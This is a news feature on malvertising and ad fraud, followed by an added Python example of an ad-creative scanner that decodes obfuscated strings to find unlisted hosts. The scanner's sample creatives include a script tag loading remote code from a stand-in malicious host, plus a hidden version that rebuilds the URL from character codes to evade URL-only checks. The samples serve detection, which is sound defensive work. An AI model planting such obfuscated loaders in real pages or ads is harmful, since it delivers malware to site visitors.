Online ads can be annoying, but increasingly they're malicious, too. In the wake of a highly publicized "malvertising" incident last December, during which attackers were able to deliver malware through online ads published on Yahoo.com, the question of how to stop such attacks is now top of mind for some.
That incident, in turn, came just a few months after security researchers at Blue Coat Systems discovered a group of sites that were delivering drive-by malvertising payloads through ads embedded in many "name brand" websites, including Salon.com and The Los Angeles Times.
The issue is starting to get high-level attention. A recent report (PDF) by the U.S. Senate said the problem endangers the security and privacy of users and recommended that the U.S. Federal Trade Commission force the industry to offer better protections through comprehensive regulation.
But it is the advertising industry, rather than end users, that has the most to lose.
"As an industry we've been reluctant to talk about these problems in the past," says Steve Sullivan, former vice president of ad technology at the Interactive Advertising Bureau (IAB), a consortium of more than 600 online advertising media and technology companies. (Sullivan recently moved to fraud detection company White Ops.)
But over the past year, the problem has risen to a level where the hundreds of businesses that make up the online advertising ecosystem are both talking about it openly, and actively supporting the IAB's Trustworthy Digital Marketing Supply Chain. That effort, part of a five-year plan (PDF) announced by the IAB in February, could set the bar for best practices and require a level of oversight for all IAB members to help reduce the incidence of malvertising, fraud and other issues.
It's a pocketbook issue, Sullivan says. Most malvertising, he explains, is designed not to harm the individual consumer but instead to recruit personal computers and mobile devices into large-scale botnets used to generate revenue by producing false advertising impressions and clicks online. In the case of the Yahoo malware, users were redirected to domains related to Paid-To-Promote.net. "The real money," Sullivan says, "is in advertising fraud."
But malvertising is also used to steal user data, says Bogdan Botezatu, senior e-threat analyst at antivirus vendor Bitdefender. "Malvertising is one of the few techniques that allow cyber criminals to silently attack unsuspecting users."
If a user's machine has been recruited into a botnet built for advertising fraud, the owner of that botnet may try to monetize it further by offering to install other software -- in reality malware that steals the user's information -- on the infected computer, says Chris Larsen, research architect at security software vendor Blue Coat Systems. That's what happened with CryptoLocker, which initially used spam to trick users into downloading it. "Then [the authors] shifted to underground forums and paid someone to install it on already infected computers," Larsen says.
A deep-rooted problem
Getting rid of malvertising won't be easy. One challenge lies with the structure and operational model of the online advertising ecosystem itself. It includes hundreds of players that sell services ranging from ad networks to supply-side platforms (which serve publishers), demand-side platforms (which serve advertisers) and ad exchanges -- open marketplaces where publishers sell inventory that advertisers can purchase.
Ad networks can also sell excess inventory through other networks and affiliates that in turn may work with other partners. Publishers -- and even the ad networks themselves -- don't always know who the buyers are.
It's an imperfect system, Sullivan says, but one that publishers must rely on to sell "remnant" inventory -- ad space that they can't sell themselves. "You either sell it to a network for a lower cost or you don't get anything at all. No one is immune to the problem," he explains. And in an opaque marketplace like an exchange, advertisers have no idea where their ad impressions are actually coming from. That makes it a target for advertising fraud.
The malvertising payload is delivered through advertising networks in various ways, which presents its own challenges to prevention. Cyber criminals tend to use three different approaches, says Sullivan. The most straightforward is for the malware distributor to simply buy ad inventory through an exchange and submit an ad with malware embedded within it.
That's hard to do today because many publishers and advertisers use tools that scan for malicious code and attempt to inspect references to other sites. "But it might not get caught if they've hidden it well," he says.
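The scanning tools described above work by pulling every outbound reference out of an ad creative and checking it against a list of hosts the publisher has vetted. The following is an added example, not code from the article or from any vendor quoted in it, that shows why "hiding it well" defeats a URL-only check: the loader URL in the third sample creative never appears literally, so a regex for `https://` sees only the allowed CDN, while a scanner that also flags string-building constructs and decodes them statically still catches it. All hostnames, creatives and the allowlist are constructed for the example.

```python
import base64
import re
from urllib.parse import unquote, urlparse

# Hypothetical allowlist of hosts the ad-ops team has vetted (constructed for this example).
ALLOWED_HOSTS = {"cdn.adserver.example", "img.advertiser.example"}

URL_RE = re.compile(r"""https?://[^\s"'<>()]+""", re.IGNORECASE)

# Constructs a banner or landing-page tag rarely needs, but that hidden loaders lean on.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode", "atob(", "document.write(")


def referenced_hosts(text):
    """Hostnames of every http(s) URL that appears literally in the text."""
    hosts = set()
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def decoded_layers(creative):
    """Strings the creative would assemble at run time, decoded statically.

    Covers three common hiding tricks: String.fromCharCode(104,116,...),
    atob('aHR0...') and unescape('%68%74...'). Anything that fails to decode
    is skipped; the obfuscation marker itself is still reported by scan_creative.
    """
    layers = []
    for codes in re.findall(r"String\.fromCharCode\(([\d,\s]+)\)", creative):
        layers.append("".join(chr(int(c)) for c in codes.split(",") if c.strip()))
    for b64 in re.findall(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", creative):
        try:
            layers.append(base64.b64decode(b64).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError
            pass
    for esc in re.findall(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)", creative):
        layers.append(unquote(esc))
    return layers


def naive_scan(creative):
    """What a URL-only check sees: literal references to hosts outside the allowlist."""
    return sorted(f"unlisted host: {h}" for h in referenced_hosts(creative) - ALLOWED_HOSTS)


def scan_creative(creative):
    """Literal references, plus obfuscation markers, plus hosts hidden in decoded strings."""
    findings = set(naive_scan(creative))
    for marker in OBFUSCATION_MARKERS:
        if marker in creative:
            findings.add(f"obfuscation marker: {marker}")
    for layer in decoded_layers(creative):
        for host in referenced_hosts(layer) - ALLOWED_HOSTS:
            findings.add(f"unlisted host (decoded at scan time): {host}")
    return sorted(findings)


# --- constructed sample creatives -------------------------------------------------
BENIGN_CREATIVE = (
    '<a href="https://img.advertiser.example/landing">'
    '<img src="https://cdn.adserver.example/banner.png"></a>'
)

# Overt: the malicious loader is referenced in plain sight.
OVERT_CREATIVE = (
    '<img src="https://cdn.adserver.example/banner.png">'
    '<script src="https://malicious-redirect.example/x.js"></script>'
)

# Hidden: the same loader URL is rebuilt from character codes, so no literal
# "https://malicious-redirect.example" exists in the tag for a regex to find.
_HIDDEN_URL = "https://malicious-redirect.example/x.js"
HIDDEN_CREATIVE = (
    '<img src="https://cdn.adserver.example/banner.png">'
    "<script>var u=String.fromCharCode("
    + ",".join(str(ord(c)) for c in _HIDDEN_URL)
    + ");var s=document.createElement('script');s.src=u;"
    "document.head.appendChild(s);</script>"
)


if __name__ == "__main__":
    for name, creative in (("benign", BENIGN_CREATIVE),
                           ("overt", OVERT_CREATIVE),
                           ("hidden", HIDDEN_CREATIVE)):
        print(f"{name:7s} naive: {naive_scan(creative)}")
        print(f"{name:7s} full:  {scan_creative(creative)}")
```

The static decoding is deliberately shallow: a creative that fetches its real payload only after a server-side check of the visitor's IP, user agent or referrer shows nothing suspicious in the tag at all, which is why ad verification vendors also render creatives in instrumented browsers and re-scan them periodically rather than once at submission.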